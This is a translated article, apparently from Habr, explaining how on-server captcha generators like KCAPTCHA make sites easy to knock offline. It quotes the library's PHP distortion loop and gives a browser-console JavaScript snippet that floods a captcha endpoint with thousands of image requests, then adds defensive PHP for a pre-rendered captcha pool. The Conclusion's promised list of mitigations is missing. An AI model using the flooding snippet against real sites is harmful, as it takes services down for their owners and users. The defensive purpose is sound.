
DoS attack on sites with their own captchas

Many sites protect themselves from unwanted automated activity (bots) with captchas. In many cases the captchas are generated by the same server that hosts the site. Attaching such a captcha to a site is very simple, and there are free captcha-generating libraries (KCAPTCHA, for example).

What is the danger?

If there is a chance that your site has enemies (for example, you are the owner of www.piratepay.ru), then by using such a captcha you risk helping them a lot: it becomes very easy to take the site down using even a single client computer.

Why?


Captcha generation is quite resource-intensive, especially when it is done in PHP (or another language that is not well suited to image processing).

In the above-mentioned KCAPTCHA, for example, the picture is assembled from fragments of a pre-rasterized font (which is stored as an image).



There are several such font files (22 in the standard distribution); on each request the directory is scanned and one of the files is selected at random.

After the randomly selected characters are pasted in, they are distorted. Here a wave distortion filter is used, written in PHP + GD2:

for($x=0;$x<$width;$x++){
    for($y=0;$y<$height;$y++){
        // Source coordinates for this output pixel after the wave distortion
        $sx=$x+(sin($x*$rand1+$rand5)+sin($y*$rand3+$rand6))*$rand9-$width/2+$center+1;
        $sy=$y+(sin($x*$rand2+$rand7)+sin($y*$rand4+$rand8))*$rand10;

        if($sx<0 || $sy<0 || $sx>=$width-1 || $sy>=$height-1){
            continue;
        }else{
            // Read the four neighbouring source pixels (one channel each)
            $color=imagecolorat($img, $sx, $sy) & 0xFF;
            $color_x=imagecolorat($img, $sx+1, $sy) & 0xFF;
            $color_y=imagecolorat($img, $sx, $sy+1) & 0xFF;
            $color_xy=imagecolorat($img, $sx+1, $sy+1) & 0xFF;
        }

        /* ... */

        // One colour allocation and one pixel write per output pixel
        imagesetpixel($img2, $x, $y, imagecolorallocate($img2, $newred, $newgreen, $newblue));
    }
}


In other words, it all happens rather slowly. No caching is provided by default. The same applies to many other libraries (including the ones built into forums: phpBB, vBulletin, etc.).

If there are a lot of requests for captcha generation, the server will not have time both to draw captchas and to serve ordinary pages (especially since the site most often runs on some CMS and caching is turned off for various reasons).

Attack


In the simplest case, it is enough to open the site in your favorite browser (so that the referer is correct, just in case), open the JavaScript debugger and type something like this into the console:

cnt = document.getElementById('content'); /* id */
regen = function() {
    var html = '';
    for (var i = 0; i < 1000; i++) {
        html += '<img src="http://www.somesite.com/kcaptcha/index.php?' + Math.random() + '" />';
    }
    cnt.innerHTML = html;
};
window.setInterval(regen, 10 * 1000);
regen();
window.setInterval('window.scrollTo(0, document.body.scrollHeight);', 500);


As a result, we get a multithreaded download of an endless number of captchas for free (each one generated by the poor server). Clearly not every server will withstand this; many (of those tested voluntarily) fail with HTTP Error 503 Service Unavailable.

Conclusion

To prevent this kind of attack, there are several obvious ways:


P.S. Do not use "forum" captchas at all, because they are very weak; replace them with reCaptcha. If you use text captchas, make sure that the number of options is large enough.
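
The article notes that KCAPTCHA draws an image on every request and caches nothing by default. The following is an added example, not code from the original article or from KCAPTCHA, showing one way to take rendering out of the request path: a worker pre-renders a bounded pool of images and the web endpoint only serves files from it. The directory, the function names, the PNG format and the $render callable are assumptions.

```php
<?php
// Added example, not KCAPTCHA code. Assumptions: $dir lies outside the web
// root, $render is a hypothetical wrapper around the existing generator that
// returns [answer, png_bytes], and refill_pool() runs from cron or a CLI worker.

// Worker side: top up the pool. At most $maxRenders images are drawn per run,
// so render cost is set by the schedule, not by the HTTP request rate.
function refill_pool(string $dir, callable $render, int $target = 500, int $maxRenders = 50): int
{
    $have = count(glob("$dir/*.png") ?: []);
    $todo = max(0, min($target - $have, $maxRenders));
    for ($i = 0; $i < $todo; $i++) {
        [$answer, $png] = $render();
        $id = bin2hex(random_bytes(16));          // unguessable, unrelated to the answer
        file_put_contents("$dir/$id.txt", $answer);
        // Write under a temporary name, then rename: readers never see a partial PNG.
        file_put_contents("$dir/$id.tmp", $png);
        rename("$dir/$id.tmp", "$dir/$id.png");
    }
    return $todo;
}

// Web side: hand out one pre-rendered image. Nothing is drawn in this code path.
function serve_captcha(string $dir): void
{
    session_start();
    $files = glob("$dir/*.png") ?: [];
    shuffle($files);
    foreach ($files as $png) {
        // Atomic claim: rename() succeeds for exactly one concurrent request.
        $claimed = $png . '.' . bin2hex(random_bytes(4));
        if (!@rename($png, $claimed)) {
            continue;                             // another request took this image
        }
        $txt = substr($png, 0, -4) . '.txt';
        $_SESSION['captcha_answer'] = file_get_contents($txt);
        header('Content-Type: image/png');
        header('Cache-Control: no-store');
        readfile($claimed);
        unlink($claimed);                         // single use: a solved image is never replayed
        unlink($txt);
        return;
    }
    http_response_code(503);                      // pool empty: fail cheaply instead of rendering
    header('Retry-After: 5');
}
```

With this layout a flood of captcha requests can at worst empty the pool, which costs a cheap 503 on the captcha endpoint rather than CPU for the whole site. A per-client request limit at the web server keeps a single client from draining the pool.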

Source: https://habr.com/ru/post/144427/

